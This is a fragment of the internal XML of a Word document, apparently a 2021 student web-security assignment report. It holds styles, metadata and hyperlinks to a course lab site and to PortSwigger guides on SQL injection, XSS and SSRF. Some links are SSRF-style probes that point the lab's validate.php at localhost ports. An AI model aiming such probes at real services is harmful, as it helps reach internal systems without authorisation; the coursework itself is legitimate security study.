    <w:rsid w:val="00EC2A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BE2D35"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="ad">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004670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77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signment-hermes.unimelb.life/profile.php" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://assignment-hermes.unimelb.life/profile.php" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080"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assignment-hermes.unimelb.life/profile.php" TargetMode="External"/><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swigger.net/web-security/ssr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swigger.net/web-security/sql-injection/cheat-sheet" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://assignment-hermes.unimelb.life/find.ph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assignment-hermes.unimelb.life/validate.php?web=http://localhost:8080"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1.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting"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assignment-hermes.unimelb.life/profile.php"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ssignment-hermes.unimelb.life/find.php" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://assignment-hermes.unimelb.life/validate.php?web=http://localhost:8873"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assignment-hermes.unimelb.life/profile.php" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://assignment-hermes.unimelb.lif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assignment-hermes.unimelb.life/question.php" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://assignment-hermes.unimelb.life/find-user.php?username=jiaxuan" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://assignment-hermes.unimelb.life/profile.php" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://assignment-hermes.unimelb.life/question.php" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://assignment-hermes.unimelb.life/api/store.php?name=OSCP" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://assignment-hermes.unimelb.life/question.php" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://assignment-hermes.unimelb.life/pass_probation.php?user=jiaxu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EFA8E-592F-48A1-B301-47593025A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Pages>
  <Words>3540</Words>
  <Characters>20180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Jie MA</cp:lastModifiedBy>
  <cp:revision>44</cp:revision>
  <cp:lastPrinted>2021-05-09T11:36:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-21T09:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-09T11:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>